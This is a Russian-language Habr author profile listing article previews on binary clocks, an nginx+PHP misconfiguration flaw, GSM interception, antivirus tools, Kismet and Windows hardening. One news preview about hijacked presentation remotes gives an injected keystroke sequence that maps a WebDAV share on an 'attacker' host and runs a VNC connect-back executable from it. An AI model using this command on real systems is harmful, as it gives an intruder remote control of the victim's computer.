Pull to refresh
0
0
Send message

BCD часы своими руками

Reading time1 min
Views35K
Очередной раз пиная студентов в сторону таблички на стене учебной аудитории с переводом двоичного кода в десятичный мне пришло в голову сделать нечто светящееся, привлекающее внимание и обязательно с двоичным кодом. Для каждого студента на занятии самое важное, после фамилии преподавателя и предмета обучения, это когда же наступит перерыв. Так что я решил сделать двоичные часы и установить их в аудитории. Закончилась сессия, разбежались студенты, появилось немножко свободного времени и вот что у меня получилось

Читать дальше →
Total votes 67: ↑55 and ↓12+43
Comments42

Уязвимость связки PHP+nginx с кривым конфигом

Reading time1 min
Views61K

Summary


Announced: 2010-05-20
Credits: 80sec
Affects: сайты на ngnix+php с возможностью загрузки файлов в директории с fastcgi_pass




Background


Зачастую How-To по настройке связки nginx с php-fpm / php-cgi есть подобные строчки:

location ~ \.php$ {
    fastcgi_pass 127.0.0.1:9000;
    fastcgi_index index.php;
    fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name;
    include fastcgi_params;
}

Читать дальше →
Total votes 163: ↑146 and ↓17+129
Comments109

На конференции Black Hat представлено ПО для дешифровки разговоров в GSM-сетях

Reading time2 min
Views5.9K
image

Не так давно я уже писал о программном обеспечении "Kraken", которое посредством использования специальных криптографических таблиц помогает взламывать алгоритм шифрования A5/1 (именно он массово используется операторами мобильной связи) для GSM-сетей. Но одно дело — взлом алгоритма, и другое — полная расшифровка закодированного сигнала. Вот с этим «на ура» справляется новоявленное ПО, также представленное на конференции Black Hat. Вообще говоря, эта конференция принесла много чего неожиданного, начиная от того самого Kraken-а, и заканчивая взломом банкоматов. Так вот, на этот раз эксперт по криптографии Карстен Ногл представил усовершенствованный программный пакет Airprobe. По заявлению разработчика, это программное обеспечение вкупе с несколькими компонентами позволяет максимально упростить задачу расшифровки сигналов, передаваемых по GSM-сетям (Airprobe позволяет записывать и раскодировать разговоры и SMS).

Читать дальше →
Total votes 39: ↑35 and ↓4+31
Comments35

Хакер создал устройство прослушивания сотовых телефонов за $1,500

Reading time2 min
Views9.8K
image
Исследователь компьютерной безопасности всего за $1,500 создал устройство, которое может перехватывать звонки некоторых типов сотовых телефонов и выполнять запись разговоров.
Атака Криса Пагета (Chris Paget) в прошедшую субботу на Defcon продемонстрировала уязвимость стандарта GSM, одной из наиболее распространённых технологий сотовой связи.
Читать дальше →
Total votes 63: ↑56 and ↓7+49
Comments67

Сравнительный обзор бесплатных антивирусов

Reading time8 min
Views435K


Решил я после обзора одного единственного антивируса AVG Antivirus 9.0 от хабравчанина Courteous написать свой и пройтись по бесплатным решениям в этой области.

Оценка антивирусов проводилась по трём параметрам — юзабилити (тут с моими оценками хабрасообщество может не согласиться), потребление ресурсов и надёжность (надёжность я оценивал по знаменитому архиву из 3732 вирусов).

A-Squared Free




Основные особенности a-squared Free 4.5
• Удаляет трояны, программы-шпионы (Spyware), рекламное ПО (Adware), интернет-червей, клавиатурных шпионов (Keyloggers), руткиты (Rootkits), звонильщики (Dialers) и другие угрозы.
• Прост в использовании и полностью бесплатен
• Более 4 млн. пользователей по всему миру

Для обладателей не слишком шустрого или лимитированного интернета минусом может являться факт начального обновления на 33мб.
Осторожно, под катом много скриншотов!
Читать дальше →
Total votes 275: ↑215 and ↓60+155
Comments319

Из России с торрентом: онлайн просмотр торрентов и не только

Reading time1 min
Views1.7K
Добрый день!
Представляю сообществу храбра детище нашей команды разработчиков.
Встречайте MediaGet! media-get.ru
image
Его ранняя сыренькая версия уже была упомянута на хабре.
Сейчас уже программа претерпела множество доработок и в нее были добавлены новые фичи.
Наша задача была сделать торрент-клиент ориентированный как на опытных пользователей торрентов, так и на людей вообще не знакомых с p2p.
Читать дальше →
Total votes 63: ↑42 and ↓21+21
Comments80

Kismet

Reading time7 min
Views83K
Kismet — это многофункциональная бесплатная утилита для работы с беспроводными сетями Wi-Fi. Пользователям она знакома в основном по статьям на тему взлома, где программа используется для обнаружения скрытых сетей или захвата пакетов. Взламывать чужие сети — плохо, а между тем Kismet — это гораздо больше чем отмычка в руках злоумышленника. В арсенале инженера информационной безопасности эта программа становится прекрасным инструментом для наблюдения и анализа эфира 802.11.
Читать дальше →
Total votes 87: ↑84 and ↓3+81
Comments14

Windows-компьютер без антивирусов

Reading time6 min
Views63K
Предупреждение: Описанное в статье несколько устарело, т.к. я забросил винды в эпоху Windows 2003.

Каждый раз, когда меня знакомые спрашивают: «какой антивирус лучше?», я могу сказать только одно: «антивирус — как придворный шаман. Бывают лучше, бывают хуже, но определить, кто лучше камлает, не получится». Антивирус не гарантирует защиту от вирусов, более того, у него есть полное моральное право пропустить новую заразу и начать её детектить дня через 2-3 после «инцидента». Т.е. как основное средство защиты он годится не очень.

Ниже описывается настройка windows, которая позволит защититься от любых реальных (т.е. встречающихся в природе) вирусов без использования антивирусов. Данная конфигурация уже 3 с половиной года работает на терминальном сервере, где пользователи (в лучшие времена до 70 человек) совсем не стесняются притаскивать на флешках всяких засранцев, лазать по сети где попало и т.д.

Теория


Любой уважающий себя вирус, оказавшись запущенным, тем или иным методом стремится в системе закрепиться, т.е. создаёт исполняемый файл или библиотеку, которая прописывается тем или иным образом в запуск. «Авто» запуск или в форме «дополнения» к другим исполняемым файлам (debugger, hander, плагин, и т.д.) — не важно. Важно: существует барьер под названием «запуск кода». Даже старые-добрые вирусы, дописывающие себя в исполняемые файлы, всё равно должны иметь возможность писать в файлы, которые предполагается запускать.

Безусловно, есть вирусы, размножающиеся без создания файлов (например, мс-бласт). Но условием появления этого вируса должна быть доступность сервера для обращений с носителей вируса или запуск кода через эксплоит в браузере\сетевой компоненте. В случае дыры в браузере дальнейшее размножение не возможно (т.к. нужно обращаться к браузерам на других машинах, а это требует поднятия сервера, куда будут ходить другие пользователи и мотивации пользователям ходить именно на этот узел). В случае дыры в сетевой компоненте и размножения без сохранения на диск, описанная мною методика с большой вероятностью работать не будет и возможна эпидемия. Однако, я не уверен, что антивирусы поймают такой 0day эксплоит, плюс, их (дыры) довольно резво фиксят, так что этот сценарий я откладываю как маловероятный. Наличие же файрволов ещё более уменьшает их опасность. От не-0day вполне же спасает своевременная (автоматизированная) установка обновлений.

Итак, основную бытовую опасность представляют вирусы, запускающиеся «из файла» (хотя бы потому, что они переживают перезагрузку компьютера). Если мы запретим каким-то образом запуск «неправильных» файлов, то проблема будет решена (т.к. несохраняющийся в файле вирус не сможет пережить перезагрузку, а в случае запуска с правами пользователя, даже банального релогина).

В Windows существует технология — политика ограниченного запуска приложений. Её можно активировать в режиме «запрещать всё, что не разрешено». Если поставить запрет полный — для всех, включая администраторов, все файлы, включая библиотеки, то мы получим точную гарантию того, что посторонний (не входящий в список разрешённых) файл не будет запущен. По-крайней мере я пока не слышал, чтобы в этой технологии были дыры. Обращаю внимание, нужно запрещать и библиотеки тоже, потому что печально известный конфикер запускается с флешек именно с помощью запуска библиотеки обманом rundll32.

Однако, запреты и разрешения не будут иметь смысла, если не сформулировать правила, которые запретят запуск «чужаков».

Модель безопасности


Перед тем, как описать подробно конфигурацию, сформулирую теоретические принципы её организации:

1. То, куда пользователь может писать закрыто для запуска.
2. То, что пользователь может запускать, закрыто для записи.
Читать дальше →
Total votes 139: ↑109 and ↓30+79
Comments133

Революция начинается сегодня

Reading time3 min
Views2K
После нескольких лет разработки, тысяч часов и более миллиона долларов собственных средств, мы с гордостью представляем релиз MODx Revoution 2.0.

Что нового?


MODx Revolution это совершенно новый MODx. Он является самой сутью того, что делает MODx отличной платформой для создания разнообразных веб-сайтов и насыщенных приложений (RIA), позволяя делать Вам больше и делать это лучше.

MODx Revolution 2.0 стал еще более мощным. Он может обслуживать высоконагруженные сайты, а также позволяет управлять мульти-сайтами и поддоменами из одной инсталляции системы.

Список новых возможностей и улучшений в MODx Revolution слишком велик для того, чтобы перечислить здесь каждое из них. Поэтому озвучим лишь те, которые, на наш взгляд, вы полюбите. Больше вы сможете узнать, попробовав MODx в деле самостоятельно или обратившись к списку изменений.
Читать дальше →
Total votes 90: ↑58 and ↓32+26
Comments120

7 бесплатных сервисов для проверки сайтов (о которых вы могли и не знать)

Reading time2 min
Views254K
Картинка для привлечения внимания
Мне достаточно часто приходится использовать различные онлайн-сервисы для проверки доступности сайтов и их поверхностных тестов и проверок.
Как показал краткий опрос коллег — почти у всех эти наборы сервисов отличаются. Я хочу показать вам свой, прошу в
подробности
Total votes 188: ↑181 and ↓7+174
Comments72

Взлом компьютера через радиопульт для презентации

Reading time1 min
Views2.1K
Если вам приходится выступать с презентациями перед большой аудиторией — будьте осторожны! Хакеры нашли способ удалённого взлома радиопультов для презентаций, так что теперь любой злоумышленник может перехватить управление пультом прямо во время вашего выступления. Хуже того, через пульт можно передавать нажатия клавиш, которые будут исполнены на презентационном компьютере.

1. [Win+R]
2. net use X: http:// attacker/webdavshare
3. X:\VNCconnectback.exe
4. [enter]

Техника уже успешно проверена на пультах Logitech R-R0001 и Logitech R400 (на фото), но уязвимости подвержены и другие пульты, где используются стандартные микросхемы производства Cypress Semiconductors.
Читать дальше →
Total votes 66: ↑59 and ↓7+52
Comments47
12 ...
37

Information

Rating
Does not participate
Location
Украина
Date of birth
Registered
Activity